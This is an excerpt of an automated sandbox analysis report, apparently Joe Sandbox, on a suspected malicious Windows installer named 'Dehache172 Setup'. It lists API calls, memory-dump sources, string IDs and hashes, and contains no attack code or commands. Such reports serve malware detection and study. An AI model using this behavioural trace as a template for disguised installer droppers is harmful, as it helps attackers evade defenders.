                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                              • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                                                                                                              • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                                                                                                              • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                                                                                                              • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                                                                                                              • lstrcmpiA.KERNEL32(Call,Dehache172 Setup: Installing), ref: 00404774
                                                                                                                                                              • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                                                                                                                • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                                                                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                                                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                                                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                                                                                                • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,?,00429860,?,?,000003FB,?), ref: 00404850
                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                                                                                                                • Part of subcall function 004049C4: lstrlenA.KERNEL32(Dehache172 Setup: Installing,Dehache172 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                                                                                                • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                                                                                                                • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,Dehache172 Setup: Installing), ref: 00404A7D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: A$C:\Users\user\AppData\Roaming\Annegrete$Call$Dehache172 Setup: Installing$t}v
                                                                                                                                                              • API String ID: 2624150263-755426445
                                                                                                                                                              • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                                                                                                              • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                                                                                                              • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                                                                                                              • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 6F951215: GlobalAlloc.KERNEL32(00000040,6F951233,?,6F9512CF,-6F95404B,6F9511AB,-000000A0), ref: 6F95121D
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6F951BC4
                                                                                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 6F951C0C
                                                                                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 6F951C16
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F951C29
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F951D09
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F951D0E
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F951D13
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F951EFA
                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 6F952098
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000008), ref: 6F952114
                                                                                                                                                              • LoadLibraryA.KERNEL32(00000008), ref: 6F952125
                                                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 6F95217E
                                                                                                                                                              • lstrlenA.KERNEL32(00000408), ref: 6F952198
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 245916457-0
                                                                                                                                                              • Opcode ID: 218e7118312ebd593a1e67fdaf6241739d73e2f92277f982ba2b664460c368c2
                                                                                                                                                              • Instruction ID: 6378cb76800743df4c0dfed617deeb649eb490a485a8ae5797904e73c3f75afd
                                                                                                                                                              • Opcode Fuzzy Hash: 218e7118312ebd593a1e67fdaf6241739d73e2f92277f982ba2b664460c368c2
                                                                                                                                                              • Instruction Fuzzy Hash: F82279B194460A9ADB21CFB8C9807EEBBF8BB06314F20462AD1A5A61C0D775E5E5CF50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                                                                                              • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                                                                                                              • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                                                                                              • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                                                                                              • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                                                                                                              • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                                                                                              • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                                                                                                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                                                                                                                • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00404FB0
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00404FC0
                                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 0040511B
                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040517B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                              • String ID: $M$N
                                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                                              • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                                                                                                              • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                                                                                                              • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                                                                                                              • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                                                                                                              APIs
                                                                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404371
                                                                                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004043A3
                                                                                                                                                              • GetSysColor.USER32(?), ref: 004043B4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 0040445E
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004044E1
                                                                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004044FA
                                                                                                                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404526
                                                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                              • String ID: Call$N$t}v
                                                                                                                                                              • API String ID: 3103080414-854349832
                                                                                                                                                              • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                                                                                              • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                                                                                                              • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                                                                                              • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                              • DrawTextA.USER32(00000000,Dehache172 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                              • String ID: Dehache172 Setup$F
                                                                                                                                                              • API String ID: 941294808-1312060957
                                                                                                                                                              • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                                                                                              • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                                                                                                              • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                                                                                              • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                                                                                                              • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                                                                                                                • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                                                                                                • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                                                                                              • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                                                                                                              • wsprintfA.USER32 ref: 00405DDB
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                                                                                                              • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                                                                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,80000000,00000003), ref: 00405C94
                                                                                                                                                                • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                              • String ID: %s=%s$[Rename]
                                                                                                                                                              • API String ID: 2171350718-1727408572
                                                                                                                                                              • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                                                                                                              • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                                                                                                              • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                                                                                                              • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                                                                                                              APIs
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F952447
                                                                                                                                                                • Part of subcall function 6F951224: lstrcpynA.KERNEL32(00000000,?,6F9512CF,-6F95404B,6F9511AB,-000000A0), ref: 6F951234
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F9523C2
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6F9523D7
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6F9523E8
                                                                                                                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 6F9523F6
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F9523FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                              • String ID: @Hmu
                                                                                                                                                              • API String ID: 3730416702-887474944
                                                                                                                                                              • Opcode ID: 9948a79587f96d39e8c0ec9c5b7d16d90c5cb08df9cc50bf7922c6791d591f96
                                                                                                                                                              • Instruction ID: ad5e78b7a1584599af3b4687e84752917a05efa9c8c924f88f499c864b664693
                                                                                                                                                              • Opcode Fuzzy Hash: 9948a79587f96d39e8c0ec9c5b7d16d90c5cb08df9cc50bf7922c6791d591f96
                                                                                                                                                              • Instruction Fuzzy Hash: B8417AB1508701EFE720CF789984B6AB7E8FB82721F10496AE555CA1D1D730E578CFA1
                                                                                                                                                              APIs
